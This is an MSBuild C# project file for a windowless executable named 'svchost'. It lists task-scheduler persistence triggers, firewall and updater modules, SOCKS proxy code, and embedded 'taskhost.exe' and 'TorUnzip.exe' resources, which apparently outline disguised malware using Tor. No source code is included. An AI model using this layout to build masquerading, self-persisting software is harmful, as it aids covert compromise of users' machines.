<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <ProjectGuid>{904AAFC0-A7A4-4DB7-8124-8068C9274E86}</ProjectGuid>
    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
    <Platform Condition=" '$(Platform)' == '' ">x86</Platform>
    <OutputType>WinExe</OutputType>
    <AssemblyName>svchost</AssemblyName>
    <TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
    <WarningLevel>4</WarningLevel>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Platform)' == 'x86' ">
    <PlatformTarget>x86</PlatformTarget>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
    <OutputPath>bin\Debug\</OutputPath>
    <DebugSymbols>true</DebugSymbols>
    <DebugType>full</DebugType>
    <Optimize>false</Optimize>
  </PropertyGroup>
  <PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
    <OutputPath>bin\Release\</OutputPath>
    <DebugSymbols>true</DebugSymbols>
    <DebugType>pdbonly</DebugType>
    <Optimize>true</Optimize>
  </PropertyGroup>
  <ItemGroup>
    <Reference Include="System" />
    <Reference Include="System.Windows.Forms" />
    <Reference Include="Microsoft.Win32.TaskScheduler" />
  </ItemGroup>
  <ItemGroup>
    <Compile Include="EncodingHelper.cs" />
    <Compile Include="IProxyDetails.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket.Authentication\AuthMethod.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket.Authentication\AuthNone.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket.Authentication\AuthUserPass.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\HandShakeComplete.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\IAsyncProxyResult.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\ProxyException.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\ProxySocket.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\ProxyTypes.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\Socks4Handler.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\Socks5Handler.cs" />
    <Compile Include="Org.Mentalis.Network.ProxySocket\SocksHandler.cs" />
    <Compile Include="Properties\AssemblyInfo.cs" />
    <Compile Include="ProxyDeets.cs" />
    <Compile Include="ProxyType.cs" />
    <Compile Include="SocksHttpWebRequest.cs" />
    <Compile Include="SocksHttpWebResponse.cs" />
    <Compile Include="SocksWebClient.cs" />
    <Compile Include="svchost.Installer\OnRun.cs" />
    <Compile Include="svchost\firewall.cs" />
    <Compile Include="svchost\Globals.cs" />
    <Compile Include="svchost\Program.cs" />
    <Compile Include="svchost\Updater.cs" />
    <Compile Include="svchost\utilities.cs" />
    <Compile Include="svchost\webclient.cs" />
    <Compile Include="svchost\WebclientFactory.cs" />
    <Compile Include="TaskSchedulerInterop\CoTaskMem.cs" />
    <Compile Include="TaskSchedulerInterop\CTask.cs" />
    <Compile Include="TaskSchedulerInterop\CTaskScheduler.cs" />
    <Compile Include="TaskSchedulerInterop\Daily.cs" />
    <Compile Include="TaskSchedulerInterop\HResult.cs" />
    <Compile Include="TaskSchedulerInterop\IEnumWorkItems.cs" />
    <Compile Include="TaskSchedulerInterop\IProvideTaskPage.cs" />
    <Compile Include="TaskSchedulerInterop\ITask.cs" />
    <Compile Include="TaskSchedulerInterop\ITaskScheduler.cs" />
    <Compile Include="TaskSchedulerInterop\ITaskTrigger.cs" />
    <Compile Include="TaskSchedulerInterop\MonthlyDate.cs" />
    <Compile Include="TaskSchedulerInterop\MonthlyDOW.cs" />
    <Compile Include="TaskSchedulerInterop\PropertySheetDisplay.cs" />
    <Compile Include="TaskSchedulerInterop\PropSheetFlags.cs" />
    <Compile Include="TaskSchedulerInterop\PropSheetHeader.cs" />
    <Compile Include="TaskSchedulerInterop\SystemTime.cs" />
    <Compile Include="TaskSchedulerInterop\TaskTrigger.cs" />
    <Compile Include="TaskSchedulerInterop\TaskTriggerType.cs" />
    <Compile Include="TaskSchedulerInterop\TriggerTypeData.cs" />
    <Compile Include="TaskSchedulerInterop\Weekly.cs" />
    <Compile Include="TaskScheduler\DailyTrigger.cs" />
    <Compile Include="TaskScheduler\DaysOfTheWeek.cs" />
    <Compile Include="TaskScheduler\MonthlyDOWTrigger.cs" />
    <Compile Include="TaskScheduler\MonthlyTrigger.cs" />
    <Compile Include="TaskScheduler\MonthsOfTheYear.cs" />
    <Compile Include="TaskScheduler\OnIdleTrigger.cs" />
    <Compile Include="TaskScheduler\OnLogonTrigger.cs" />
    <Compile Include="TaskScheduler\OnSystemStartTrigger.cs" />
    <Compile Include="TaskScheduler\RunOnceTrigger.cs" />
    <Compile Include="TaskScheduler\ScheduledTasks.cs" />
    <Compile Include="TaskScheduler\Scheduler.cs" />
    <Compile Include="TaskScheduler\StartableTrigger.cs" />
    <Compile Include="TaskScheduler\Task.cs" />
    <Compile Include="TaskScheduler\TaskFlags.cs" />
    <Compile Include="TaskScheduler\TaskList.cs" />
    <Compile Include="TaskScheduler\TaskStatus.cs" />
    <Compile Include="TaskScheduler\Trigger.cs" />
    <Compile Include="TaskScheduler\TriggerList.cs" />
    <Compile Include="TaskScheduler\TriggerType.cs" />
    <Compile Include="TaskScheduler\WeeklyTrigger.cs" />
    <Compile Include="TaskScheduler\WhichWeek.cs" />
  </ItemGroup>
  <ItemGroup>
    <EmbeddedResource Include="svchost\taskhost.exe" />
    <EmbeddedResource Include="svchost\TorUnzip.exe" />
  </ItemGroup>
  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>